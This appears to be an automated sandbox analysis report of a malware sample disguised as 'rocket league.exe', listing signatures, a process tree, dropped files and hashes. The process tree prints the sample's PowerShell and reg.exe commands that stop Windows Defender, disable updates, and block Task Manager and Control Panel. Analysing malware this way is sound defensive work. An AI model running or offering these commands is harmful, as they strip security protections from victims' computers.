Analysis

  • max time kernel
    138s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/05/2024, 00:19

General

  • Target

    rocket league.exe

  • Size

    5.2MB

  • MD5

    a66c11e16baaf08400416e305b5118c4

  • SHA1

    3d49238bc8e4865871306416ed8d308745aa4fa4

  • SHA256

    38992ee97c1b46dc373cdd5f32fb5de1e5bb8da4e81734d84f860dc92fd41cf2

  • SHA512

    440a6a8b1de909e3e20fb768ef55596bb530413c4b4df317d8a145be8f1527c0b8788d415f705893b1b1be07a42e80f57f044aa1b1f65197a56b98afe3692de7

  • SSDEEP

    98304:onD+rKIDTGpzoLLJ3TbwaVvrZE0IdeyoFQK15W8ASLmbNYJERw1jrTH31DzZGYn:onqeIm9onJ5hrZEReyiU8AdZYJERurTr

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rocket league.exe
    "C:\Users\Admin\AppData\Local\Temp\rocket league.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Users\Admin\AppData\Local\Temp\rocket league.exe
      "C:\Users\Admin\AppData\Local\Temp\rocket league.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "sc config WinDefend start= disabled"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "net stop WinDefend"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" stop WinDefend
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop WinDefend
            5⤵
              PID:4288
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:516
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            4⤵
              PID:3956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\" /v NoAutoUpdate /t REG_DWORD /d 1 /f"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3204
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /t REG_DWORD /d 1 /f
              4⤵
                PID:3952
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Explorer\" /v DisableNotificationCenter /t REG_DWORD /d 1 /f"
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:940
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
                4⤵
                  PID:4824
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization\" /v NoLockScreen /t REG_DWORD /d 1 /f"
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2956
                • C:\Windows\system32\reg.exe
                  "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization /v NoLockScreen /t REG_DWORD /d 1 /f
                  4⤵
                    PID:1388
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "reg add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3824
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                    4⤵
                      PID:4872
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "reg add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" /v NoControlPanel /t REG_DWORD /d 1 /f"
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2892
                    • C:\Windows\system32\reg.exe
                      "C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
                      4⤵
                        PID:1572

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        6cf293cb4d80be23433eecf74ddb5503

                        SHA1

                        24fe4752df102c2ef492954d6b046cb5512ad408

                        SHA256

                        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                        SHA512

                        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        2ad33642f863ae14ee53bc6853ee330e

                        SHA1

                        ca81cc7d8c33a46ebe97bc1d3db55e41a813029e

                        SHA256

                        17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19

                        SHA512

                        52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        1542328a8546914b4e2f1aef9cb42bea

                        SHA1

                        7a0ac5969dfb20eb974e8a3bd8707243fa68f94f

                        SHA256

                        7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737

                        SHA512

                        b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        2b09a4ee48534faf0a8f91aee9a1c92a

                        SHA1

                        58db278bbe8453eb341294e7f303c2f2fca5815f

                        SHA256

                        0cc656020d2efb13b0140e35229d04b3f10c64f0d2bc7813ef07160a65468263

                        SHA512

                        3ba905d6b0e33804bef1917ab50666a3a6ec71a47e186f095aa4db4606ea189559b9192187d00895fe1f7a50f603076f4071ad33bf37a867ba960a11102e3a2a

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        88be3bc8a7f90e3953298c0fdbec4d72

                        SHA1

                        f4969784ad421cc80ef45608727aacd0f6bf2e4b

                        SHA256

                        533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                        SHA512

                        4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        64B

                        MD5

                        421e2421d469a848255625b722ebff12

                        SHA1

                        fe15054bd7268165f377de43706226af644e5af9

                        SHA256

                        54436d18ea4ca55d4673917f78ea644b12d65f1f27cdee4b32e6987bc1deefed

                        SHA512

                        f464f642f2a934e9507a64bf9d3043d4254405b15855a4d42af0d97341df9851b494cf6d164d6ac393d635040654bf4a33cc3c159b6ea8e05947d829c575e4e3

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        8857491a4a65a9a1d560c4705786a312

                        SHA1

                        4f3caf2ad5d66a2410c9cca0381d26a46e832cb4

                        SHA256

                        b6e1a16a11075cb4e0bae0cebdb6ac15f5d66e0005f557703708a04cd11bd360

                        SHA512

                        d9497c47898cdc4c4fc62158830dc931990e08bb4a28a5d19d4187a87a2afab8a4bd58ca346563210b476c9adb9a714bfe1057e0ebce85d1fd94731be6d02660

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        a316ebd4efa11d6b6daf6af0cc1aebce

                        SHA1

                        ab338dd719969c70590dbc039b90e2758c741762

                        SHA256

                        f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

                        SHA512

                        67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\VCRUNTIME140.dll

                        Filesize

                        99KB

                        MD5

                        8697c106593e93c11adc34faa483c4a0

                        SHA1

                        cd080c51a97aa288ce6394d6c029c06ccb783790

                        SHA256

                        ff43e813785ee948a937b642b03050bb4b1c6a5e23049646b891a66f65d4c833

                        SHA512

                        724bbed7ce6f7506e5d0b43399fb3861dda6457a2ad2fafe734f8921c9a4393b480cdd8a435dbdbd188b90236cb98583d5d005e24fa80b5a0622a6322e6f3987

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_bz2.pyd

                        Filesize

                        83KB

                        MD5

                        6c7565c1efffe44cb0616f5b34faa628

                        SHA1

                        88dd24807da6b6918945201c74467ca75e155b99

                        SHA256

                        fe63361f6c439c6aa26fd795af3fd805ff5b60b3b14f9b8c60c50a8f3449060a

                        SHA512

                        822445c52bb71c884461230bb163ec5dee0ad2c46d42d01cf012447f2c158865653f86a933b52afdf583043b3bf8ba7011cc782f14197220d0325e409aa16e22

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_ctypes.pyd

                        Filesize

                        122KB

                        MD5

                        29da9b022c16da461392795951ce32d9

                        SHA1

                        0e514a8f88395b50e797d481cbbed2b4ae490c19

                        SHA256

                        3b4012343ef7a266db0b077bbb239833779192840d1e2c43dfcbc48ffd4c5372

                        SHA512

                        5c7d83823f1922734625cf69a481928a5c47b6a3bceb7f24c9197175665b2e06bd1cfd745c55d1c5fe1572f2d8da2a1dcc1c1f5de0903477bb927aca22ecb26a

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_decimal.pyd

                        Filesize

                        264KB

                        MD5

                        ce4df4dfe65ab8dc7ae6fcdebae46112

                        SHA1

                        cdbbfda68030394ac90f6d6249d6dd57c81bc747

                        SHA256

                        ffbe84f0a1eab363ca9cf73efb7518f2abd52c0893c7cc63266613c930855e96

                        SHA512

                        fc8e39942e46e4494356d4a45257b657495cbfa20e9d67850627e188f70b149e22603ae4801b4ba7b9a04d201b3787899d2aee21565237d18e0afce9bae33ee9

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_hashlib.pyd

                        Filesize

                        63KB

                        MD5

                        f377a418addeeb02f223f45f6f168fe6

                        SHA1

                        5d8d42dec5d08111e020614600bbf45091c06c0b

                        SHA256

                        9551431425e9680660c6baf7b67a262040fd2efceb241e4c9430560c3c1fafac

                        SHA512

                        6f60bfac34ed55ff5d6ae10c6ec5511906c983e0650e5d47dac7b8a97a2e0739266cae009449cced8dff59037e2dbfc92065fbbdfde2636d13679e1629650280

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_lzma.pyd

                        Filesize

                        157KB

                        MD5

                        b5355dd319fb3c122bb7bf4598ad7570

                        SHA1

                        d7688576eceadc584388a179eed3155716c26ef5

                        SHA256

                        b9bc7f1d8aa8498cb8b5dc75bb0dbb6e721b48953a3f295870938b27267fb5f5

                        SHA512

                        0e228aa84b37b4ba587f6d498cef85aa1ffec470a5c683101a23d13955a8110e1c0c614d3e74fb0aa2a181b852bceeec0461546d0de8bcbd3c58cf9dc0fb26f5

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_socket.pyd

                        Filesize

                        77KB

                        MD5

                        f5dd9c5922a362321978c197d3713046

                        SHA1

                        4fbc2d3e15f8bb21ecc1bf492f451475204426cd

                        SHA256

                        4494992665305fc9401ed327398ee40064fe26342fe44df11d89d2ac1cc6f626

                        SHA512

                        ce818113bb87c6e38fa85156548c6f207aaab01db311a6d8c63c6d900d607d7beff73e64d717f08388ece4b88bf8b95b71911109082cf4b0c0a9b0663b9a8e99

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\base_library.zip

                        Filesize

                        822KB

                        MD5

                        d3a47ef5b669b3ab59aa27a54b015d24

                        SHA1

                        d646309640b93ce05d268a00104d8a6ee6ee4463

                        SHA256

                        b89ba73c7ce7a7800237401b351b047996f3c975f9e6ed401864f5481acf644f

                        SHA512

                        09095fc7042a77f0c35f6a79d2c180b2660b613a82697a29662e39db80b3ed442c0433f915d17a271aba2f4f5c39615af2bac274de7095dd907413414d630dcc

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\libcrypto-1_1.dll

                        Filesize

                        3.2MB

                        MD5

                        cc4cbf715966cdcad95a1e6c95592b3d

                        SHA1

                        d5873fea9c084bcc753d1c93b2d0716257bea7c3

                        SHA256

                        594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1

                        SHA512

                        3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\libffi-7.dll

                        Filesize

                        32KB

                        MD5

                        eef7981412be8ea459064d3090f4b3aa

                        SHA1

                        c60da4830ce27afc234b3c3014c583f7f0a5a925

                        SHA256

                        f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

                        SHA512

                        dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\python39.dll

                        Filesize

                        4.3MB

                        MD5

                        11c051f93c922d6b6b4829772f27a5be

                        SHA1

                        42fbdf3403a4bc3d46d348ca37a9f835e073d440

                        SHA256

                        0eabf135bb9492e561bbbc5602a933623c9e461aceaf6eb1ceced635e363cd5c

                        SHA512

                        1cdec23486cffcb91098a8b2c3f1262d6703946acf52aa2fe701964fb228d1411d9b6683bd54527860e10affc0e3d3de92a6ecf2c6c8465e9c8b9a7304e2a4a6

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\select.pyd

                        Filesize

                        26KB

                        MD5

                        7a442bbcc4b7aa02c762321f39487ba9

                        SHA1

                        0fcb5bbdd0c3d3c5943e557cc2a5b43e20655b83

                        SHA256

                        1dd7bba480e65802657c31e6d20b1346d11bca2192575b45eb9760a4feb468ad

                        SHA512

                        3433c46c7603ae0a73aa9a863b2aecd810f8c0cc6c2cd96c71ef6bde64c275e0fceb4ea138e46a5c9bf72f66dcdea3e9551cf2103188a1e98a92d8140879b34c

                      • C:\Users\Admin\AppData\Local\Temp\_MEI22802\unicodedata.pyd

                        Filesize

                        1.1MB

                        MD5

                        8320c54418d77eba5d4553a5d6ec27f9

                        SHA1

                        e5123cf166229aebb076b469459856a56fb16d7f

                        SHA256

                        7e719ba47919b668acc62008079c586133966ed8b39fec18e312a773cb89edae

                        SHA512

                        b9e6cdcb37d26ff9c573381bda30fa4cf1730361025cd502b67288c55744962bdd0a99790cedd4a48feef3139e3903265ab112ec545cb1154eaa2a91201f6b34

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ifx3jwpq.kiz.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • memory/2756-50-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2756-51-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2756-63-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4456-48-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4456-45-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4456-44-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4456-43-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4456-33-0x000001FA5A170000-0x000001FA5A192000-memory.dmp

                        Filesize

                        136KB

                      • memory/4456-32-0x00007FFEFACC3000-0x00007FFEFACC5000-memory.dmp

                        Filesize

                        8KB